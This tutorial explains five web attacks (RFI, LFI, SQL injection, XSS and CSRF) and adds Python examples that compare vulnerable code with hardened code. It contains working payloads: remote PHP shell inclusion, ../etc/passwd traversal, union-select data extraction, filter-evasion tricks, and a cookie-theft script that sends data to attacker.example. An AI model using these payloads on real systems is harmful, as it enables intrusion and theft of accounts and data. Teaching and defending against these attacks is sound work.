1. Basic Terms and Words:-
-Vulnerability : A security hole that can be exploited to change files or gain access to the server.
-Database : A place where information such as users, posts, polls and other variables and unique info is stored; usually queried with SQL.
-Exploit : Anything that lets someone use a vulnerability to their advantage.
-RFI “Remote File Inclusion” : When a web script can be made to include and execute a file fetched from a remote server, usually used to get a PHP shell such as c99 running on the target.
-LFI “Local File Inclusion” : When a user can make the script include or display a local file on the server that is not meant to be seen.
-SQL Injection : Injecting MySQL/MSSQL syntax into a URL or form parameter that is concatenated into a query, in order to read from (or change) the database, including user information.
-XSS “Cross Site Scripting” : When a website echoes user-supplied data into a page without encoding it, so that attacker-controlled HTML or script runs in other users’ browsers. It can be used to steal cookies and sessions.
-CSRF “Cross Site Request Forgery” : An attack that forces a logged-on victim’s browser to send a request to a vulnerable web application, which then performs the chosen action on behalf of the victim.
2. Explanation of Attacks
RFI Exploit-
In an RFI exploit, the web application can be made to include pages that are not local, that is, files fetched from another server. For example, let’s say you are browsing a site and the URL is http://www.example.com/index.php?page=news, and when you go to their contact page it changes to http://www.example.com/index.php?page=contact. This is where the vulnerability starts. Most of the time the script will be written so that it only maps that parameter onto a fixed set of pages, but if the coder was being lazy and had no clue about security, he might have passed the parameter straight to include() (the $page = $_GET['page']; include($page); pattern shown in the LFI section below).
Now there is a large problem with the code: because PHP’s include() accepts URLs when allow_url_include (and allow_url_fopen) is enabled in php.ini, you are able to load remote pages through http://www.example.com. A quick way to test is http://www.example.com/index.php?page=http://www.google.com/ (the scheme is needed; a bare google.com is treated as a local relative path). If Google’s page loads inside the site, the site in question is vulnerable to an RFI attack; if it does not, allow_url_include is probably off (the default since PHP 5.2), and the same code may still be exploitable as an LFI. One of the most useful ways to take advantage of an RFI is a PHP shell. Some of the most popular ones are c99 and r57; they are easily found around the internet, so coming across a PHP shell should be no problem. To use one, host it on another server as a text file. If you keep the .php extension on your shell, it will be executed on YOUR server when the target fetches it, and only its output will be included; served as .txt, the source is fetched verbatim and executed on the target. To use the shell on the remote server, just add its URL to the parameter like this:
http://www.example.com/index.php?pag…….rshell.txt The target fetches the file and runs it as PHP, and the RFI is now complete.
LFI Exploit-
The base of an LFI exploit yet again is poorly coded PHP that does not validate variables before they reach include(). An example of PHP code that would allow an LFI to occur would be:
<?php
// page name taken straight from the URL, with no validation at all
$page = $_GET['page'];
// the @ only hides the warning when the include fails; it does not stop the include
@include($page);
?>
Now, an LFI is used to access files that are already on the server; a good target on a Unix server is the passwd file in /etc. This vulnerability is similar to an RFI and uses much of the same techniques. For example, a page called http://www.example.com/index.php?page=index could be used in an LFI depending on the code.
You want to reach the passwd file, so you need to climb out of the web directory. To see if the LFI works, try page=../../../../../../../etc/passwd. Each “..” goes up one directory, and the number of ../ depends on how many directories deep the script lives; extra ones are harmless once you reach /, so overshooting is the usual approach. The passwd file lists every account on the system (name, UID, home directory, shell); on any modern system the password hashes are not in it but in /etc/shadow, which is readable only by root, so do not expect passwords from passwd. The file is world-readable because many applications depend on it, which makes it a reliable test that the inclusion works. Other good files to look through are the Apache logs, other log files, and configuration files, which often contain database credentials.
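The RFI and LFI sections come down to the same unvalidated include. The following Python is an added example (it is not the page’s PHP and not any project’s code) that transposes the $page = $_GET['page']; include($page); pattern and shows the two checks that close it: reject anything carrying a URL scheme (RFI) and confine the resolved path to the document root (LFI). The document root, the page names and the attacker host are assumed for illustration.

```python
import os
from urllib.parse import urlsplit

# Assumed layout for this example: includable pages live under this directory.
DOC_ROOT = "/var/www/html/pages"
# Preferred fix: only page names the application knows about are ever included.
ALLOWED_PAGES = {"news", "contact", "index"}


def vulnerable_resolve(page: str) -> str:
    """Mirrors $page = $_GET['page']; include($page); the raw parameter is the path.

    A URL is fetched and executed (RFI, when allow_url_include is on) and a
    chain of ../ walks out of the web root (LFI). No check of any kind.
    """
    return page


def safe_resolve(page: str) -> str:
    """Return the file to include, or raise ValueError naming the reason."""
    # 1. RFI: anything carrying a scheme (http://, ftp://, php://, data:) is a
    #    stream wrapper, never a page name. Reject before touching the filesystem.
    if urlsplit(page).scheme:
        raise ValueError("remote")

    # 2. LFI: build the real path and make sure it is still under DOC_ROOT.
    #    normpath collapses '..', and os.path.join discards DOC_ROOT entirely
    #    when 'page' is absolute, so '/etc/passwd' is caught here as well.
    #    Use os.path.realpath in production so symlinks are resolved too.
    full = os.path.normpath(os.path.join(DOC_ROOT, page + ".php"))
    if os.path.commonpath([DOC_ROOT, full]) != DOC_ROOT:
        raise ValueError("traversal")

    # 3. Allowlist: with a known set of pages this check alone would suffice;
    #    keeping both costs nothing.
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page")
    return full


def classify(page: str) -> str:
    """Label a page parameter: 'ok', 'remote', 'traversal' or 'unknown page'."""
    try:
        safe_resolve(page)
        return "ok"
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    # Constructed inputs: a legitimate page, the LFI probe from the text, an
    # absolute path, and an RFI pointing at an assumed attacker host.
    for p in ("news", "../../../../../../../etc/passwd",
              "/etc/passwd", "http://attacker.example/shell.txt"):
        print(f"{p:45} vulnerable -> {vulnerable_resolve(p):45} hardened -> {classify(p)}")
```

The scheme check is what matters for RFI and the containment check for LFI; the allowlist is the one to reach for first when the set of pages is fixed, because it makes the other two redundant.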
SQL Injections-
For this section I am going to focus on MySQL injection, not MSSQL. There are a few important pieces of SQL syntax you need to know before you start:
‘union all select’: Appends the rows of a second SELECT to the result of the first; both must return the same number of columns, which is why the column count has to be found first
‘order by’: Sorts the result by the given column number; ‘order by N’ errors when N is larger than the number of columns, which is what makes it useful for counting them
‘load_file()’: Reads a file from the database server’s filesystem, such as /etc/passwd (needs the FILE privilege, and the file must be readable by the MySQL server process)
‘char()’: Builds a string from character codes, for example char(58) is ‘:’; used when quotes or other symbols are filtered
‘concat()’: Joins several values into a single string, so that several pieces of data can be shown in one visible column. You will see how useful this is later on.
‘--’: Comment; everything after it up to the end of the line is ignored. In MySQL the two dashes must be followed by a space, so in a URL write ‘--+’ (the + decodes to a space) if a bare ‘--’ at the end of the parameter does not work
Once you have a basic understanding of the syntax, it is time to inject a site. To start, let’s see if we can run our own queries. As an example site, let’s use http://www.example.com/index.php?id=5. To see if we can run our own queries, try these:
/index.php?id=5 and 1=0--
and if that does not work you can try
/index.php?id='
The latter of the two is usually faster and provides the same result. If this is successful, the page should either go blank (the added condition makes the query return no rows) or display a MySQL error (the unbalanced quote breaks the query). If it does neither, the site may still be vulnerable to blind SQL injection, where nothing is reflected in the page; that is not covered in this guide, so we stick with basic, output-based injection. Moving on, if the page changed or went blank, the site could be vulnerable. We want to find how many columns the original query returns and which of them are printed on the page, so we use:
/index.php?id=5 order by 20--
If you get an error with ‘5 order by 20’, decrease and increase the last number like this:
/index.php?id=5 order by 15--
For example, if the page loads correctly with ‘5 order by 12’ but you get an error with ‘5 order by 13’, the query has 12 columns. Now, to view them, use ‘union all select’ with the same number of columns, and make the first SELECT return nothing (id=null, or a negative id) so that only our row is shown:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12--
Now that the query has worked, look at the page: the numbers that appear show which columns are printed. Let’s say columns 2, 5 and 6 are visible. We want information about the server’s MySQL, so replace those numbers with functions:
/index.php?id=null union all select 1,@@version,3,4,user(),database(),7,8,9,10,11,12--
The page now displays the MySQL version, the database user the application connects as, and the name of the current database. There is also a way to output all of this in one column, which is neater and is essential when only one column is visible. For that we use concat(), described at the beginning of the section:
/index.php?id=null union all select 1,concat(user(),char(58),database(),char(58),version()),3,4,5,6,7,8,9,10,11,12--
We are only using one column because concat() joins all the values into a single string, with char(58) (a colon) as the separator. This is all the MySQL I am going to cover in this article. Up to this point, you have learned that your target is very vulnerable. If you run into problems, use the following tips for filter evasion:
-You can write string values as hex literals (0x726f6f74 for ‘root’) so that no quotes are needed, and URL-encode characters, as long as the server still decodes them correctly.
-Try mixing up the case of your keywords (UnIoN SeLeCt) to see whether the filter is case-sensitive.
-In a URL the + sign is an encoded space, so use it between keywords where spaces get mangled (null+union+all+select); a + inside a keyword turns into a space and breaks the query.
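The whole procedure above (the 1=0 and quote probes, counting columns with order by, pulling data through union all select, and the fix) as an added example that is not part of the original article. It uses an in-memory SQLite database constructed here as a stand-in for the target’s MySQL; the table, rows and payloads are made up for the illustration, and SQLite joins strings with || where MySQL uses concat() and does not require a space after --.

```python
import sqlite3

# Constructed stand-in for the target's database. SQLite runs in memory so the
# example works offline; the injection logic is the same against MySQL, only
# a few functions differ (noted where used).
SCHEMA = """
CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT);
INSERT INTO news VALUES (5, 'Hello', 'First post', 'admin');
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret');
"""


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, id_param: str):
    """What index.php?id=... does when it concatenates the parameter into SQL."""
    sql = "SELECT id, title, body, author FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def safe_lookup(conn, id_param: str):
    """Parameterised version: the value is bound as data, never parsed as SQL."""
    sql = "SELECT id, title, body, author FROM news WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()


def probe(conn, lookup, id_param: str) -> str:
    """Classify the response the way the text does: 'error', 'blank' or 'rows'."""
    try:
        rows = lookup(conn, id_param)
    except sqlite3.Error:
        return "error"
    return "rows" if rows else "blank"


def count_columns(conn, max_cols: int = 20) -> int:
    """'order by n--' succeeds while n <= column count and errors just past it."""
    for n in range(1, max_cols + 1):
        if probe(conn, vulnerable_lookup, f"5 order by {n}--") == "error":
            return n - 1
    return max_cols


def union_extract(conn, cols: int):
    """id=null empties the real result, UNION ALL SELECT supplies ours. Column 2
    carries the data; the rest are placeholders. MySQL would use
    concat(username,char(58),password); SQLite joins strings with ||."""
    placeholders = ["1", "username || ':' || password"] + [str(i) for i in range(3, cols + 1)]
    payload = "null union all select " + ", ".join(placeholders) + " from users--"
    return vulnerable_lookup(conn, payload)


if __name__ == "__main__":
    conn = open_db()
    for payload in ("5", "5 and 1=0--", "'"):
        print(f"{payload!r:16} vulnerable={probe(conn, vulnerable_lookup, payload):6} "
              f"safe={probe(conn, safe_lookup, payload)}")
    cols = count_columns(conn)
    print("columns:", cols)
    print("union:", union_extract(conn, cols))
```

The point of the safe_lookup comparison is that the parameterised query never errors and never returns another table’s rows, whatever the parameter contains: the injection string is compared against the id column as a value and simply matches nothing.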
XSS Attacks-
Personally, when it comes to XSS attacks, I have not used them very much. They can be very useful if you want to steal a user’s cookie or session in order to gain access to off-limits areas. Since I have not had much experience with XSS, I will give a brief summary of the different ways they can be used. First, to see whether a site can be exploited with an XSS attack, you must test whether the injection works. To do this, enter one of the two following lines into a form (search bar, comment field, login field, etc.) on the site, or into a URL parameter that is echoed back in the page:
Code:
<h1>test</h1>
<script>alert("test")</script>
If the page is displayed with a large heading that says “test” or shows a pop-up alert, you know the XSS works. The first line shows that the site reflects raw HTML; the second shows that script execution is possible, which is what cookie theft requires. A payload stored in a comment field hits every visitor, while one reflected from a search parameter has to be delivered as a link, which is why XSS fits naturally with social engineering. XSS exploits have been found on MANY major websites, such as CBS.com to name one.
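The heading / pop-up test above, as an added example that is not from the original article: a constructed search page that reflects its parameter unencoded, the same page with HTML encoding applied, and a checker that submits the two probes and reports which come back verbatim. The page markup and the collector URL are assumed for illustration.

```python
import html

# The two probes from the text: raw markup, then script.
HTML_PROBE = "<h1>test</h1>"
SCRIPT_PROBE = '<script>alert("test")</script>'


def render_search_vulnerable(query: str) -> str:
    """Reflects the search term into the page as-is, like an unescaped echo."""
    return ("<html><body><h2>Results for: " + query + "</h2>"
            "<p>No matches.</p></body></html>")


def render_search_fixed(query: str) -> str:
    """Same page with the value HTML-encoded for the element-body context:
    < > & and quotes become entities, so the browser shows them as text."""
    return ("<html><body><h2>Results for: " + html.escape(query, quote=True) + "</h2>"
            "<p>No matches.</p></body></html>")


def xss_test(render) -> dict:
    """Submit both probes and report which come back unencoded. The check is
    textual (the probe appears verbatim in the response), which is exactly
    what the heading / pop-up test in the text observes in a browser."""
    return {
        "html": HTML_PROBE in render(HTML_PROBE),
        "script": SCRIPT_PROBE in render(SCRIPT_PROBE),
    }


def cookie_theft_payload(collector_url: str) -> str:
    """Once script runs, the usual next step is to send document.cookie to a
    host the attacker controls (URL assumed). Cookies flagged HttpOnly are
    not visible to document.cookie and survive this."""
    return ('<script>new Image().src="' + collector_url +
            '?c=" + encodeURIComponent(document.cookie);</script>')


if __name__ == "__main__":
    for name, render in (("vulnerable", render_search_vulnerable), ("fixed", render_search_fixed)):
        print(name, xss_test(render))
    print(cookie_theft_payload("http://attacker.example/collect"))
```

html.escape is the right fix only for text placed in an element body; a value written into an attribute, a URL or a script block needs the encoding for that context instead.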
CSRF Attacks-
A CSRF exploit is an attack that forces a logged-on victim’s browser to send a request to a vulnerable web application, which then performs the chosen action on behalf of the victim. The browser attaches the victim’s session cookie to the request automatically, so the application sees a legitimate, authenticated request; the defence is to require something in every state-changing request that the attacker’s page cannot know, normally a per-session anti-CSRF token (SameSite cookies help as well). Here is an example of how it could be used:
Let’s say that the page to delete a user in a forum is admin/deleteuser.php?user=name (where name is the target username). As normal members we do not have the rights to delete a user, so we need an admin to do it. One way is to get an admin of the forum to click a link that takes him to admin/deleteuser.php?user=name; because the action is a plain GET, the link (or an <img src=...> on any page he visits) is enough, and the user is deleted without him knowing. You are tricking the admin into performing the action for you. A confirmation page asking whether the admin really wants to perform the action, with a “Yes” and a “No” button, is sometimes suggested as the fix, but it only helps if the confirming request itself carries an unguessable token; otherwise the attacker simply forges the confirmation request instead of the original one.
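The deleteuser.php scenario above as an added example (not code from the article or from any forum software): a constructed session table, the handler as described with the cookie as its only check, and the same handler with a per-session token. The cookie value, the usernames and the token scheme are assumed for illustration.

```python
import hmac
import secrets

# Constructed server-side state: one logged-in admin, keyed by the session
# cookie value that the browser attaches to every request for the site.
SESSIONS = {
    "c0ffee": {"user": "admin", "role": "admin", "csrf": secrets.token_hex(16)},
}


def csrf_token_for(cookie: str) -> str:
    """The token the server embeds as a hidden field in its own delete form.
    An attacker's page cannot read it: the same-origin policy keeps the forum's
    HTML out of reach, and the token never appears in a URL the attacker sees."""
    return SESSIONS[cookie]["csrf"]


def delete_user_vulnerable(users: set, cookie: str, method: str, params: dict) -> str:
    """admin/deleteuser.php?user=name as described in the text: the session
    cookie is the only check, so any request the admin's browser sends is obeyed,
    including one triggered by a link or <img src> on the attacker's page."""
    session = SESSIONS.get(cookie)
    if session is None or session["role"] != "admin":
        return "forbidden"
    users.discard(params.get("user"))
    return "deleted"


def delete_user_fixed(users: set, cookie: str, method: str, params: dict) -> str:
    """Same action with the two checks that stop the forgery."""
    session = SESSIONS.get(cookie)
    if session is None or session["role"] != "admin":
        return "forbidden"
    # State changes only over POST. This alone is not enough (an auto-submitting
    # form on the attacker's page can POST cross-site), but it removes the
    # trivial link / <img> vector.
    if method != "POST":
        return "rejected: method"
    # The token must match the one issued to this session. compare_digest keeps
    # the comparison constant-time.
    if not hmac.compare_digest(params.get("csrf", ""), session["csrf"]):
        return "rejected: token"
    users.discard(params.get("user"))
    return "deleted"


def forged_request() -> dict:
    """What the attacker's page can make the admin's browser send: the cookie
    goes along automatically, but the token cannot be included."""
    return {"cookie": "c0ffee", "method": "GET", "params": {"user": "alice"}}


def legitimate_request() -> dict:
    """The forum's own form submission, token included."""
    return {"cookie": "c0ffee", "method": "POST",
            "params": {"user": "alice", "csrf": csrf_token_for("c0ffee")}}


def run(handler, request: dict, users: set) -> str:
    return handler(users, request["cookie"], request["method"], request["params"])


if __name__ == "__main__":
    for name, handler in (("vulnerable", delete_user_vulnerable), ("fixed", delete_user_fixed)):
        users = {"admin", "alice", "bob"}
        print(name, "forged:", run(handler, forged_request(), users), "->", sorted(users))
        users = {"admin", "alice", "bob"}
        print(name, "legit: ", run(handler, legitimate_request(), users), "->", sorted(users))
```

A confirmation page built on the fixed handler works because its “Yes” form carries the token; one built on the vulnerable handler is forged exactly like the original request.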
3. Conclusion
This paper is meant to be an article and easy-to-use reference guide to today’s most popular ways of remotely exploiting web applications. It can be used as a starting point to spark interest in certain types of exploits, and as a way to gain knowledge about them.